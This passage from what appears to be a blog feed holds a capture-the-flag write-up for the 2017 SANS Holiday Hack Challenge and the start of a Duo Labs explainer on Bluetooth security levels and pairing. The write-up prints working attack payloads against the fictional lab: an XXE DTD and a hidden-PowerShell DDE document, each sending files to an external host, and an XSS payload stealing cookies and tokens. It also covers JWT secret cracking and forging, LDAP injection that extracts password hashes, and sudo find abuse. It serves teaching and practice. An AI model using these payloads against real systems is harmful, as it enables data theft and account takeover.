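                             email.get("subject"), email.get("message")])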

The generated CSV contains an email from the elf Holly Evergreen containing a link to page 4 from The Great Book.

Title: The Rise of the Lollipop Guild
Hash: f192a884f68af24ae55d9d9ad4adf8d3a3995258

The question asks us what we learn from The Great Book page. In summary, we learn that there are rumors that a group of munchkins from Oz have infiltrated the North Pole in an attempt to disrupt Christmas operations.

Terminal: There’s Snow Place Like Home

The “There's Snow Place Like Home” level terminal gives the following prompt:

My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.
total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup

Using file, we see that the binary is compiled for ARM architectures, while we’re in an x86 architecture:

elf@887d4f25493d:~$ uname -a
Linux 887d4f25493d 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3 (2017-12-03) x86_64 x86_64 x86_64 GNU/Linux
elf@887d4f25493d:~$ file trainstartup 
trainstartup: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=005de4685e8563d10b
3de3e0be7d6fdd7ed732eb, not stripped

We can run the binary with qemu-arm, solving the challenge:

$ qemu-arm ./trainstartup
    Merry Christmas
    Merry Christmas
You did it! Thank you!

Problem 5 - Santa’s Naughty or Nice List

Here’s the next question in the storyline:

5) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

To find the number of infractions required, we used Santa’s Naughty and Nice list previously found on the SMB server, along with the list of infractions logged by the North Pole Police department on their website.

We can search the NPPD infraction database using a wildcard query such as status:* to retrieve all infractions with the option to download the infractions as a JSON file.

Now that we have the Naughty/Nice list as well as the full list of individual infractions, we can compare the two using a quick script to find the number of infractions required to be on the naughty list.
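
Here’s a rough sketch of that comparison, assuming the Naughty and Nice List CSV has Name and Status columns and the NPPD download is a JSON object with an infractions list keyed by name (the real field names may differ):

import csv
import json
from collections import Counter, defaultdict

# Count infractions per person from the NPPD JSON download.
# Assumption: the download contains an "infractions" list with "name" fields.
with open("infractions.json") as fh:
    nppd = json.load(fh)
infraction_counts = Counter(i["name"] for i in nppd["infractions"])

# Bucket everyone on the Naughty/Nice list by their infraction count.
# Assumption: the CSV columns are "Name" and "Status."
buckets = defaultdict(Counter)
with open("Naughty and Nice List.csv") as fh:
    for row in csv.DictReader(fh):
        buckets[infraction_counts.get(row["Name"], 0)][row["Status"]] += 1

for count in sorted(buckets):
    print("%d infractions - Nice: %-4d Naughty: %d"
          % (count, buckets[count]["Nice"], buckets[count]["Naughty"]))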

0 infractions - Nice: 14   Naughty: 0
1 infractions - Nice: 318  Naughty: 0
2 infractions - Nice: 95   Naughty: 0
3 infractions - Nice: 33   Naughty: 0
4 infractions - Nice: 0    Naughty: 26
5 infractions - Nice: 0    Naughty: 47
6 infractions - Nice: 0    Naughty: 6
7 infractions - Nice: 0    Naughty: 1
10 infractions - Nice: 0   Naughty: 1

It looks like anyone with four or more infractions is put on the Naughty list.

To find the insider threat moles, we can use the list of infractions combined with the “Munchkin Mole Advisory” discovered on the SMB server: Munchkin Mole Advisory

The Munchkin Mole Report tells us about two moles: Boq Questrian and Bini Aru, who engaged in “throwing rocks” and “aggravated hair pulling” before disappearing.

When we look up the two moles on the NPPD’s site, we see that they each have 3 infractions, and Bini also has an infraction for giving atomic wedgies, aside from the hair pulling and rock-throwing mentioned in the mole advisory report. Assuming that wedgie-giving is also a munchkin activity, we filtered the list of infractions to find similar individuals.

We filtered for characters who had committed one or more of the munchkin-related infractions above (wedgie-giving, hair-pulling, rock-throwing). After filtering, we have a list of 8 possible moles, including the two mentioned in the mole report. We can then filter this list down further by calculating each character's chance of being a munchkin as the percentage of munchkin-related crimes relative to their total number of crimes. If we list out the possible moles with more than a 50% chance of being a munchkin mole, we get:

Sheri Lewis | Munchkin Chance: 60.0% | Total Crimes: 5
Nina Fitzgerald | Munchkin Chance: 66.7% | Total Crimes: 6
Bini Aru | Munchkin Chance: 75.0% | Total Crimes: 4
Wesley Morton | Munchkin Chance: 100.0% | Total Crimes: 4
Boq Questrian | Munchkin Chance: 75.0% | Total Crimes: 4
Kirsty Evans | Munchkin Chance: 75.0% | Total Crimes: 4

So we can say with some certainty that these are the minimum six moles we were asked to find.

Terminal: Bumble to Stray

The terminal in this level gives the following prompt:

Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
total 28704
-rw-r--r-- 1 root root 24191488 Dec  4 17:11 access.log
-rwxr-xr-x 1 root root  5197336 Dec 11 17:31 runtoanswer

We can refer to this blog post for a helpful one-liner to parse out the least frequently seen user agents from the access logs:

awk -F\" '{print $6}' combined_log | sort | uniq -c | sort -fr

Looking at the bottom of the list, we see these values:

1 masscan/1.0
1 Dillo/3.0.5
1 curl/7.35.0

Only one of these, Dillo, is a browser, so this is the answer to the challenge:

elf@64c67c7042d3:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the least popular browser in the web log: Dillo
That is the least common browser in the web log! Congratulations!

Beating the video game portion of this level, we obtain page 5 of The Great Book as well as this conversation: Bumble Convo

Title: The Abominable Snow Monster
Hash: 05c0cacc8cfb96bb5531540e9b2b839a0604225f

Problem 6 - Elf-as-a-Service

Here’s the next storyline question:

6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

Running an nmap scan on eaas.northpolechristmastown.com confirms that this is a web application running on IIS:

Nmap scan report for eaas.northpolechristmastown.com (10.142.0.13)
Host is up (0.00031s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Index - North Pole Engineering Presents: EaaS!
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Visiting eaas.northpolechristmastown.com returns a page that lets you view and manage Elf orders. You can find the full source code here. Elf Order

In the HTML of the index page, we can see a link pointing to /Home/DisplayXml which claims to let us view our current orders:

<div class="col-md-4 col-lg-4">
    <a href='/Home/DisplayXML'><img src="/Content/img/o2.png" alt=""></a>
    <h4>EC2: Elf Checking System 2.0</h4>
    <p>To see your current orders, <a href="/Home/DisplayXML">click here</a></p>
</div>

Requesting this page gives a table of valid orders with the ability to upload a new file via a form:

<div class="row">
    <img src="/Content/img/o4.png" alt="">
    <h4>Need to make a change?</h4>
    <p>Upload a new form using the builder below
        <form action="/Home/DisplayXml" enctype="multipart/form-data" method="post">
            <input type="file" name="file" />
            <input type="submit" value="Upload" />
       </form>
    </p>
</div>

Seeing the path /Home/DisplayXml indicates that this endpoint is likely expecting an XML file to be uploaded. Allowing untrusted XML to be uploaded and processed can be dangerous and lead to XXE attacks. With this in mind, we can refer to a blog post from SANS on how to exploit XXE attacks in IIS.

First, we’ll set up a Document Type Definition (DTD) file to be hosted on our external server. This DTD file uploads the content of C:\greatbook.txt to our remote server as a URL parameter. We’ll call this file payload.dtd.

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://x.x.x.x:1237/?%stolendata;'>">

Then, we can upload the actual XML payload that references our DTD file to the web application:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE Elf [
    <!ELEMENT Elf ANY >
    <!ENTITY % extentity SYSTEM "http://x.x.x.x:1237/payload.dtd">
    %extentity;
    %inception;
    %sendit;
    ]
>

When the XML file is uploaded, it is executed and we see the result appear in our web server logs:

35.185.118.225 - - [22/Dec/2017 03:56:39] "GET /payload.dtd HTTP/1.1" 200 -
35.185.118.225 - - [22/Dec/2017 03:56:39] "GET /?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1" 200 -

Requesting this URL returns page 6 of The Great Book.

Title: The Dreaded Inter-Dimensional Tornadoes
Hash: 8943e0524e1bf0ea8c7968e85b2444323cb237af

Terminal: I Don’t Think We’re In Kansas Anymore

Opening the terminal in the “I Don’t Think We’re In Kansas Anymore” level gives the following prompt:

Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.
total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer

This appears to be a straightforward SQLite challenge. First, let’s open the database and determine the schema:

elf@22b7ca7055df:~$ sqlite3 christmassongs.db 
sqlite> .tables
likes  songs
sqlite> .schema likes
CREATE TABLE likes(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  like INTEGER,
  datetime INTEGER,
  songid INTEGER,
  FOREIGN KEY(songid) REFERENCES songs(id)
);
sqlite> .schema songs
CREATE TABLE songs(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  title TEXT,
  artist TEXT,
  year TEXT,
  notes TEXT
);

Next, we can create a SQL query that finds the songs with the most likes. This was the query we used:

SELECT songs.title, count(likes.songid) as number_of_likes 
from songs
left join likes
on (songs.id = likes.songid)
group by
    songs.id
order by number_of_likes;

Running the query against the database showed that “Stairway to Heaven” had the most likes:

The Little Boy that Santa Claus Forgot|2140
Joy to the World|2162
Stairway to Heaven|11325

Entering “Stairway to Heaven” as our answer solved the challenge:

elf@22b7ca7055df:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!

Problem 7 - SCADA System (EMI)

After previously gaining access to the webmail system and downloading the various emails, we can set our sights on the EMI server:

7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

We’re told that we need to gain access via a phishing attack. Looking through the emails in our CSV, we see this message from Alabaster Snowball:

"Do you have that awesome gingerbread cookie recipe you made for me last year? You sent it in a MS word .docx file. I would totally open that docx on my computer if you had that. I would click on anything with the words gingerbread cookie recipe in it. I'm totally addicted and want to make some more.

We can also see a message from the elf Minty Candycane to Alabaster Snowball indicating that the relatively new phishing technique leveraging DDE-enabled Word documents might be successful:

“You know I'm a novice security enthusiast, well I saw an article a while ago about regarding DDE exploits that dont need macros for MS word to get command execution.

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Should we be worried about this?

I tried it on my local machine and was able to transfer a file. Here's a poc:”

Taking this as a hint, we can create a DDE-enabled Word document with the following payload to upload The Great Book page to a server we control:

{DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -W hidden $e=(New-Object System.Net.WebClient).UploadFile('http://x.x.x.x:8888/upload', 'C:\GreatBookPage7.pdf');"}
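
For the UploadFile call to land anywhere, something has to be listening on our server. Below is a minimal sketch of a receiver, assuming Python’s built-in http.server on port 8888; the exact framework doesn’t matter, since WebClient.UploadFile simply issues an HTTP POST, and the uploaded file can be carved out of the saved request body afterwards:

from http.server import BaseHTTPRequestHandler, HTTPServer

class UploadHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # WebClient.UploadFile POSTs the file contents in the request body;
        # dump the raw body to disk and extract the PDF from it later.
        length = int(self.headers.get("Content-Length", 0))
        with open("greatbookpage7.raw", "wb") as fh:
            fh.write(self.rfile.read(length))
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8888), UploadHandler).serve_forever()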

Sending this document to alabaster.snowball@northpolechristmastown.com with the phrase “gingerbread cookie recipe” in the message results in the DDE payload being executed, and page 7 of The Great Book page being uploaded:

35.185.57.190 - - [29/Dec/2017 22:18:42] "POST /upload HTTP/1.1" 302 -
35.185.57.190 - - [29/Dec/2017 22:18:42] "GET /upload HTTP/1.1" 200 -

Title: “Regarding the Witches of Oz”
Hash: c1df4dbc96a58b48a9f235a1ca89352f865af8b8

Terminal: Oh Wait! Maybe We Are

Opening the terminal for the “Oh Wait! Maybe We Are” level, we see the following prompt:

My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.
Restore /etc/shadow with the contents of /etc/shadow.bak, then run "inspect_da_box" to complete this challenge.
Hint: What commands can you run with sudo?

The hint is pretty clear - we need to see what commands we can run as sudo. We can do that with sudo -l:

elf@60f4256e332e:~$ sudo -l
Matching Defaults entries for elf on 60f4256e332e:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elf may run the following commands on 60f4256e332e:
    (elf : shadow) NOPASSWD: /usr/bin/find

This tells us that the user elf is allowed to run the find command as the shadow group without needing to input a password. We can use find's -exec flag to locate shadow.bak and copy it back to /etc/shadow.

elf@60f4256e332e:~$ sudo -g shadow find /etc/ -name shadow.bak -exec cp {} /etc/shadow \;

Finally, as instructed, we run inspect_da_box to complete the challenge.

elf@60f4256e332e:~$ inspect_da_box 
/etc/shadow has been successfully restored!

Problem 8 - Elf Database

8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

Navigating to the index page of the elf database service, we are presented with a login page. There’s a message at the bottom with a link to contact support to reset the password: Elf Database

Clicking the link displays a form suggesting that a “customer service elf will review your request to reset your account”. Customer Service Login

The Javascript in custom.js shows how logins are being processed:

function login() {
    var uname = $('#username').val().trim();
    var passw = $('#password').val().trim();
    if (uname && passw) {
        $.post( "/login", { username: uname, password: passw }).done(function( result ) {
            if (result.bool) {
                Materialize.toast(result.message, 4000);
                localStorage.setItem('np-auth',result.token)
                setTimeout(function(){
                    window.location.href = result.link;
                }, 1000);
            } else {
                Materialize.toast(result.message, 4000);
            }
        }).fail(function(error) {
            Materialize.toast('Error: ' + error.status + " " + error.statusText, 4000);
        })
    } else {
        Materialize.toast('You must input a valid username and password!', 4000);
    }
}

The result of a successful login is stored in localStorage under the np-auth key. Watching the network requests when we open the login page, we see that session cookies are also being used. So, if we can steal a valid session cookie as well as the valid np-auth token from an authenticated user, we can log in as that user.

To do this, we can create and submit a malicious support ticket with the following message that will trigger an XSS vulnerability that sends the support elf’s session cookie and auth token to a server that we control:

<img src=x onerror="null;this.src='http://x.x.x.x:4444/test?cookie=' + document.cookie + '&npauth='+localStorage.getItem('np-auth')">

Shortly after submitting this ticket, this request appears in our access logs:

35.196.239.128 - - [22/Dec/2017 19:24:00] "GET /test?cookie=SESSION=hxxer50N2e1C2AFt5X06&npauth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1" 200 -

One of the hints indicates that the auth token may be a JSON Web Token (JWT). Decoding the token with the pyjwt library confirms this is the case:

>>> import jwt
>>> jwt.decode('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I', verify=False)
{u'dept': u'Engineering', u'ou': u'elf', u'expires': u'2017-08-16 12:00:47.248093+00:00', u'uid': u'alabaster.snowball'}

Unfortunately, this token is expired. To log in to the application, we need to find a way to modify the token with an updated expires field.

The integrity of JWTs relies on a strong secret used in creating the signature. We can attempt to crack the secret with a tool called jwt-cracker. Within a few moments of running the tool, the secret is recovered:

$ ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I
Secret is "3lv3s"

We can use this secret to modify the contents of the JWT to have a valid expires field using the pyjwt library:

>>> import jwt
>>> jwt.encode({u'dept': u'Engineering', u'ou': u'elf', u'expires': u'2018-08-16 12:00:47.248093+00:00', u'uid': u'alabaster.snowball'}, '3lv3s')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.gr2b8plsmw_JCKbomOUR-E7jLiSMeQ-evyYjcxCPXco'

Adding the obtained session cookie as well as putting the modified JWT in our localStorage takes us to the admin page: Personnel Search

On the admin page, we see the ability to search for elves or reindeer, as well as a dropdown that lets us see our account information. This dropdown contains a link for the “Santa Panel”; however, trying to access the Santa Panel throws an error telling us that we have to be a Claus to log in.

The Javascript on the page contains this snippet:

$('#santa_panel').click(function(e){
        e.preventDefault();
        if (user_json['dept'] == 'administrators') {
            pass = prompt('Confirm you are a Claus by confirming your password: ').trim()
            if (pass) {
                poster("/html", { santa_access: pass }, token, function(result){
                    if (result) {
                        $('#inneroverlay').html(result);
                        $('.overlay').css('display','flex');
                    } else {
                        Materialize.toast('Incorrect Password...', 4000);
                    }
                });    
            }
        } else {
            Materialize.toast('You must be a Claus to access this panel!', 4000);
        }
    });

This tells us that, to authenticate to the Santa Panel, we need to change our user information in our authentication token to be in the administrators department, as well as having Santa’s password.

Let’s start with the password. Ideally, we’d be able to leverage the Elf search function to somehow retrieve Santa’s password. Looking through the page source, we see this commented out snippet:

//Note: remember to remove comments about backend query before going into north pole production network
/*
isElf = 'elf'
if request.form['isElf'] != 'True':
    isElf = 'reindeer'
attribute_list = [x.encode('UTF8') for x in request.form['attributes'].split(',')]
result = ldap_query('(|(&(gn=*'+request.form['name']+'*)(ou='+isElf+'))(&(sn=*'+request.form['name']+'*)(ou='+isElf+')))', attribute_list)
#request.form is the dictionary containing post params sent by client-side
#We only want to allow query elf/reindeer data
*/

This snippet of backend code shows that our input into the name field is inserted directly into an LDAP query. This is dangerous because it allows us to modify the query being executed using LDAP Injection.

Specifically, we can modify the query to retrieve Santa’s information as well as elf information. This is what a normal query might look like if we searched for “santa”:

ldap_query('(|(&(gn=*santa*)(ou=elf))(&(sn=*santa*)(ou=elf)))', attribute_list)

We need to adjust the first condition so that we aren’t limited to searching through the elf OU. One way we could do that is by creating a query that closes off the first condition and then adjusts the syntax. Here’s an example of what the resulting query would look like with the input santa*)(ou=*))(&gn=:

ldap_query('(|(&(gn=*santa*)(ou=*))(&(gn=*)(ou=elf))(&(sn=*santa*)(ou=*))(&(gn=*)(ou=elf)))', attribute_list)

This causes the LDAP query to return any Santa user as well as any user in the elf OU.

Additionally, we want to modify the requested attributes to include the userPassword LDAP attribute, which will return the hashed password. We can modify this using an HTTP proxy: HTTP Proxy
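
Here’s a sketch of what that modified request looks like as a script instead of a proxy edit. The /search path and the way the np-auth token and session cookie are attached are assumptions; the form field names (name, isElf, attributes) come from the commented-out backend code above, and the injection string is the one described in the previous step:

import requests

# Hypothetical endpoint; the real path is whatever the personnel search
# page posts to. Cookie and token values come from the earlier steps.
URL = "http://edb.northpolechristmastown.com/search"

payload = {
    # LDAP injection that breaks out of the elf-only condition.
    "name": "santa*)(ou=*))(&gn=",
    "isElf": "True",
    # Ask for userPassword along with the normal attributes.
    "attributes": "gn,sn,mail,uid,department,description,userPassword",
}
resp = requests.post(
    URL,
    data=payload,
    cookies={"SESSION": "hxxer50N2e1C2AFt5X06"},       # stolen session cookie
    headers={"np-auth": "<forged JWT from earlier>"},  # token placement is a guess
)
print(resp.text)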

Running this returns the information for every elf as well as Santa:

[
    ['cn=santa,ou=human,dc=northpolechristmastown,dc=com',
    {'telephoneNumber': ['123-456-7893'],
    'description': ['A round, white-bearded, jolly old man in a red suit, who lives at the North Pole, makes toys for children, and distributes gifts at Christmastime. AKA - The Boss!'],
    'mail': ['santa.claus@northpolechristmastown.com'],
    'department': ['administrators'], 
    'gn': ['Santa'],
    'profilePath': ['/img/elves/santa.png'],
    'uid': ['santa.claus'],
    'userPassword': ['d8b4c05a35b0513f302a85c409b4aab3'],
    'sn': ['Claus']}]
]

Sometimes, it’s easiest to first search for a hash in Google to see if someone else has already done the work of cracking it. In this case, searching for our hash takes us to a SANS hash-cracking service where we see that the password is 001cookielips001: Google SANS Hash Crack

Now that we have Santa’s password, we need to recreate our auth token using the secret we cracked earlier to indicate that we are logged in as Santa:

>>> import jwt
>>> jwt.encode({u'dept': u'administrators', u'ou': u'*', u'expires': u'2018-08-16 12:00:47.248093+00:00', u'uid': u'santa.claus'}, '3lv3s')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiYWRtaW5pc3RyYXRvcnMiLCJvdSI6IioiLCJleHBpcmVzIjoiMjAxOC0wOC0xNiAxMjowMDo0Ny4yNDgwOTMrMDA6MDAiLCJ1aWQiOiJzYW50YS5jbGF1cyJ9.sctCItbO58uewzfMcodRdwS-PxGd4avPNnqZMsMvYKU'

Adding this to localStorage and using the password to log in to the Santa Panel yields the letter to Santa, solving the challenge: Letter to Santa

Terminal: We’re Off To See The...

The terminal in the “We’re Off to See The…” level presents us with this prompt:

Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.
total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:47 isit42
-rw-r--r-- 1 root root   654 Dec 15 19:59 isit42.c.un

We can start by viewing the contents of the partial C source code:

#include <stdio.h>
// DATA CORRUPTION ERROR
// MUCH OF THIS CODE HAS BEEN LOST
// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE
// MAKE THE isit42 BINARY RETURN 42
// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME
int getrand() {
    srand((unsigned int)time(NULL)); 
    printf("Calling rand() to select a random number.\n");
    // The prototype for rand is: int rand(void);
    return rand() % 4096; // returns a pseudo-random integer between 0 and 4096
}
int main() {
    sleep(3);
    int randnum = getrand();
    if (randnum == 42) {
        printf("Yay!\n");
    } else {
        printf("Boo!\n");
    }
    return randnum;
}

This SANS blog post details how to use LD_PRELOAD to load a shared library we specify before executing a binary. This allows us to override functions. In our case, we can override rand() to always return 42.

Here’s the source code to make that happen:

#include <stdio.h>
int rand(void) {
    return 42;
}

We can compile this to a shared library:

elf@7752de8a5df8:~$ gcc fake_rand.c -o fake_rand -shared -fPIC

Then, we can run the binary, telling LD_PRELOAD to load our library and solve the challenge:

elf@7752de8a5df8:~$ LD_PRELOAD="$PWD/fake_rand" ./isit42 
Starting up ... done.
Calling rand() to select a random number.
Congratulations! You've won, and have successfully completed this challenge.

Problem 9 - Villain Reveal

9) Which character is ultimately the villain causing the giant snowball problem? What is the villain's motive?

To answer this question, you need to fetch at least five of the seven pages of The Great Book and complete the final level of the North Pole and Beyond. After beating the final video game level, you are presented with the following conversation revealing that the villain was Glinda, the Good Witch from Oz: Good Witch from Oz Convo

]]>
<![CDATA[Understanding Bluetooth Security]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/understanding-bluetooth-security https://duo.com/blog/understanding-bluetooth-security Duo Labs Tue, 09 Jan 2018 08:30:00 -0500

The Bluetooth specification is huge and quite complex. As a researcher looking at various Internet of Things (IoT) devices, it helps to understand what the vendor of a given device actually implemented. This is especially important in environments where older, less secure Bluetooth implementations on older IoT devices have to interact with newer devices capable of better security, and you have to determine what security is actually being used.

In the past, I’ve run into roadblocks while trying to figure out what was going on during various Bluetooth communications such as pairing and encryption, so I’ve put together this blog post to help explain some of the security aspects, how these aspects are typically used, and how to easily spot a few of them during a research effort.

It should be noted that this entire blog post started because I needed to explain LE Privacy in a forthcoming blog post and the “appendix” kept growing until I simply split it off into its own thing.

History

Before we explain current Bluetooth security, we should go back in time a bit. Bluetooth was invented in 1989, but really came into use during the 2000s. There is no one Bluetooth protocol; it is a collection of different protocols grouped together under a single specification. Bluetooth is managed by the Bluetooth Special Interest Group, also referred to as Bluetooth SIG.

In an effort to explain a concept like LE Privacy, we must explain a chunk of the Bluetooth history of security implementations. The “LE” in LE Privacy stands for Low Energy, but it actually has nothing to do with power consumption nor does it mean to imply there is a higher energy consumption mode involving the “Privacy” part of LE Privacy. It is actually a holdover from when there was a “larger” implementation that used more energy (Bluetooth Classic), and a “smaller” implementation when battery life was critical and energy consumption needed to be curtailed (Bluetooth Low Energy, or LE or BLE or even BTLE).

Eventually, these were combined in Bluetooth 4.0, and Bluetooth SIG chose features from both Classic and LE, based upon what was better or when one had something the other didn’t. And that is where the “LE” in “LE Privacy” came from. Remember that comment about Bluetooth being complex? Well, the naming of things like this doesn’t help.

The current standard, as of this writing, is Bluetooth 5 (there is no 5.0, it is just 5), although most devices use (and are optimized for) 4.0–4.2. As we will see later on, a lot of IoT vendors try to support legacy authentication protocols dating back as far as Bluetooth 2.0, and these can affect the quality of security.

In the OSI Model, there are seven layers—yes I can hear you groaning—but I just need to reference a few of them quickly. In the TCP/IP world, TCP is at layer 4, the transport layer. Bluetooth’s layer 4 is Logical Link Control and Adaptation Protocol, or L2CAP.

Sitting on top of L2CAP, mainly in layer 5 - the session layer - is the Security Manager, doing the whole Security Manager Protocol. It is responsible for pairing, encryption and signing. So the application sitting at layer 7 doesn’t have any information about the security stuff; it just chugs along and cares not about the lower layers’ various processes so long as it can send and receive data.

Bluetooth Smart and Bluetooth Smart Ready

As mentioned earlier, with Bluetooth 4.0 came a new security model based upon previous and new work from Bluetooth SIG. In an effort to handle requirements for devices that run off of batteries or devices that might frequently unpair and pair, the terms “Bluetooth Smart” and “Bluetooth Smart Ready” were established. These are simply groupings of characteristics, but their nature affects the security aspect of various devices, so it helps to know the background.

Bluetooth Smart is implemented on peripheral devices like headphones, speakers, fitness trackers, medical devices and so on. These devices are battery-powered and often pair to devices that they may lose contact with for extended periods of time. They may only require periodic connection to their paired host, like during data transfer. Additionally, they can maintain a pairing despite long sleep periods between wake modes—even preventing a second device from pairing.

Bluetooth Smart Ready devices are devices that can talk to Bluetooth Smart devices and use all of their capabilities. Your smartphone or your laptop are good examples of Bluetooth Smart Ready devices. If you have an old Bluetooth 2.0 or 3.0 device, a Bluetooth Smart Ready device can still talk to it.

While I have rarely seen the “Bluetooth Smart” or “Bluetooth Smart Ready” stickers on products (or I have ignored them), they do help illustrate the need for various security elements. For example, how does one maintain pairing in a secure fashion between a computer and a fitness tracker that will periodically upload its data? How does one secure a device or ensure the privacy of the device’s owner when the device may spend most of its time in sleep mode?

Bluetooth Security Modes

There are two security modes: LE Security Mode 1 and LE Security Mode 2. There are also four security levels, appropriately numbered 1 through 4, with 4 being the most secure. Yes, you can mix levels and modes. To further complicate things, there are two additional security modes named Mixed Security Mode and Secure Connection Only Mode.

We’ll start with the security levels first:

  • Security Level 1 supports communication without security at all, and applies to any Bluetooth communication, but think of it as applying to unpaired communications.
  • Security Level 2 supports AES-CMAC encryption (aka AES-128 via RFC 4493, which is FIPS-compliant) during communications when the devices are unpaired.
  • Security Level 3 supports encryption and requires pairing.
  • Security Level 4 supports all the bells and whistles, and instead of AES-CMAC for encryption, ECDHE (aka Elliptic Curve Diffie-Hellman aka P-256, which is also FIPS-compliant) is used instead.

Then the security modes:

  • Security Mode 1 is those levels without signing of data
  • Security Mode 2 is those same levels with signing of data, including both paired and unpaired communications.
  • Mixed Security Mode is when a device is required to support both Security Mode 1 and 2, i.e., it needs to support signed and unsigned data.

Secure Connection Only Mode is Secure Mode 1 with Security Level 4, meaning that all incoming and outgoing traffic in a Bluetooth device involve authenticated connections and encryption only. To complete the confusing complexity, you can run Secure Connection Only Mode with Secure Mode 2 instead of 1 to ensure all data is signed, but since the data is encrypted, and more math means more computing power, and more computing power means faster battery drain, Bluetooth SIG apparently felt encryption without signing was good enough for this particular mode.

Pairing

Now knowing what these modes and levels are, one can start to answer some of those questions about maintaining pairing despite sleep mode or enforcing privacy on a Bluetooth connection between devices that aren’t always talking to each other. But we need to discuss how they are implemented, starting with pairing.

The pairing process is pretty much where everything security-related takes place and is decided beforehand. Its purpose is to determine what the capabilities are on each end of the two devices getting ready to pair and then to get them actually talking to each other. The pairing process happens in three phases, and we will quickly outline each one.

Phase One

In phase one, the two devices let each other know what they are capable of doing. The values they are reading are Attribute Protocol (ATT) values. These live at layer 4 with L2CAP, and are typically not ever encrypted. They determine which pairing method is going to be used in phase two, and what the devices can do and what they expect. For example, ATT values will be different for a Bluetooth Smart vs. a Bluetooth Smart Ready device.

Phase Two

